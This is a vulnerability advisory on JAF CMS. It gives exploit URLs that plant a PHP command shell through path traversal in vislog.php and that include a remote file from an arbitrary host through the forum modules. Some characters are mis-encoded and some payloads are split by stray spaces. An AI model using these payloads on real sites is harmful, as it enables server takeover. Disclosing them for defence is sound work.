High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in JAF CMS which could be exploited to compromise vulnerable system.
Remote code execution in JAF CMS
The vulnerability exists due to insufficient sanitation of input data in module/log/vislog.php. A remote attacker can create files with arbitrary contents within the web root directory and execute them with privileges of the webserver.
Exploitation example:
Creating a malicious file named 123.php:
http://[host]/module/log/vislog.php?_SERVER[%27PHP_SELF%27]=1&from=%3c%3f+sy stem(%24_GET%5b%27cmd%27 %5d)%3b+%3f%3e&root=β¦/β¦/123.php%00
Executing arbitrary commands:
http://[host]/123.php?cmd=ls
Remote file inclusion vulnerability in JAF CMS
Input passed to the βwebsiteβ parameter in module/forum/main.php and module/forum/forum.php is not properly sanitized before being used to include files. A remote attacker can include and execute php files from arbitrary locations. Successful exploitation requires that register_globals is set to On.
Exploitation example:
http://[host]/module/forum/main.php?website=http://any_host/any_file%00
htt p://[host]/module/forum/ forum.php?website=http://any_host/any_file%00
This vulnerability was independently discovered by XxX and it was assigned a CVE number CVE-2008-1609.